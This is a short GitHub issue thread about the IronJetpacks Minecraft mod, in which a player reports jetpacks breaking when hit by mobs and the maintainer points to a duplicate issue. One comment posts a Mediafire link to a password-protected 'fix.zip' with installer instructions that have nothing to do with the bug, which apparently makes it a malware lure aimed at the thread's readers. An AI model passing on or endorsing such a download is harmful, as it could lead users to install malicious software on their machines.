### ISSUE TITLE
Braking when hit by mob

### ISSUE THREAD

**Issue by RIExJonny** [BlakeBr0/IronJetpacks#102]
**Describe the bug**

When hit by a mob unless it's in a 
Cuiro slot. Idk if this is ment or not. 

**To Reproduce**

**Expected behavior**

Not brake

**Screenshots / Scripts / Logs**
Please add your logs and scripts (if applicable).

**Versions (please complete the following information):**
 - Minecraft: latest update
 - Forge:
 - Cucumber:
 - Iron Jetpacks:
 - Singleplayer or Multiplayer:

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BlakeBr0** [comment]
https://github.com/BlakeBr0/IronJetpacks/issues/101

**Comment by RIExJonny** [comment]
sorry blake and thank you agine
